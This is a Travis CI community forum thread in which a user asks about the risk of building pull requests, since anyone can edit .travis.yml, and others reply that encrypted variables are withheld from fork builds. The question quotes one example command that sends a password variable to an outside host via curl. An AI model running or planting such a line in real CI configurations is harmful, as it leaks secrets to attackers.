Travis CI Community

A risk about `Build pushed pull requests`

Travis CI Discussions & Feedback

liyuanqiu April 30, 2019, 9:38am 1

If we enable Build pushed pull requests, PRs will trigger builds.

Anyone can modify .travis.yml file in a PR, that means if Build pushed pull requests is turned on, the attackers can do anything in CI.

Such as:

curl http://example.com/xxx?v=$password

How to get rid of this risk?

hugovk April 30, 2019, 11:38am 2

Use encrypted environment variables.

Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code.

1 Like

BanzaiMan April 30, 2019, 12:18pm 3

You cannot use encrypted variables on PR builds (from forks) due to security risks. https://docs.travis-ci.com/user/pull-requests/#pull-requests-and-security-restrictions

1 Like

liyuanqiu April 30, 2019, 1:05pm 4

Thank you very much

liyuanqiu April 30, 2019, 1:06pm 5

Thank you too

Topic		Replies	Views	Activity
Security and CI Pull Requests question Travis CI Discussions & Feedback	2	551	February 20, 2020
Environment variable that tells whether PR is a draft PR Environments build-env , github , travis-build	1	767	May 26, 2020
Pull request number on push Environments travis-build	2	600	April 17, 2020
How to prevent builds in conflicted PRs? Travis CI Discussions & Feedback github-integration	3	1415	August 8, 2023
Build not being triggered after a merged Pull Request Deployment	5	1365	September 3, 2020